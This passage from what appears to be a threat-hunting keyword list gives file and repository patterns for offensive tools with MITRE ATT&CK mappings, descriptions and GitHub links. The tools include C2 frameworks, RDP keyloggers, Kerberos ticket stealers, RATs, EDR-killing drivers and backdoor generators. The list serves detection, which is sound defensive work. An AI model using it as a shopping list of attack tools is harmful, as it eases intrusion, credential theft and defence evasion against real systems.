with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*/taidoor.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/TakeMyRDP*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,1,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*/Talon.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Talon/*Agent/Source*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/target:exe spacerunner.cs*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*/targetedKerberoast*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z -*/targetedKerberoast.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/targets-asn.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-map4to6.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-multicast-echo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-multicast-invalid-dst.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-multicast-mld.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-multicast-slaac.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-ipv6-wordlist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-sniffer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-traceroute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/targets-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Tash.dll*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/TashClient.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/TashLoader.*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/tccbypass.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/tcpshell.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/Teamphisher.txt*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*/Teamphisher/targets.txt*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*/teamserver-linux.tar.gz*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/teamserver-win.zip*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/teamspeak2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/teamstracker.db*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*/teamstracker.git*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*/teamstracker.py*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*/TelegramRAT.git*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*/telnet_cdata_ftth_backdoor_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/telnet-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/telnet-encryption.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/telnet-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/terminate/Terminator.sys*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*/test32.dll*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*/test64.dll*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*/tests/NIST_CAVS/*.rsp*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/tests/test-bof.ps1*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/tevora-threat/PowerView*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*/tftp-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/TGSThief.git*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z -*/TGSThief/*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z -*/tgtParse.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/tgtParse/tgtParse.*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/thc-hydra/*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*/the-backdoor-factory.git*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*/TheFatRat*,offensive_tool_keyword,TheFatRat,Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.,T1027 - T1059 - T1105 - T1218,TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/Screetsec/TheFatRat,1,0,N/A,N/A,10,8267,2217,2023-06-11T19:16:05Z,2016-07-24T10:30:19Z -*/theHarvester.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 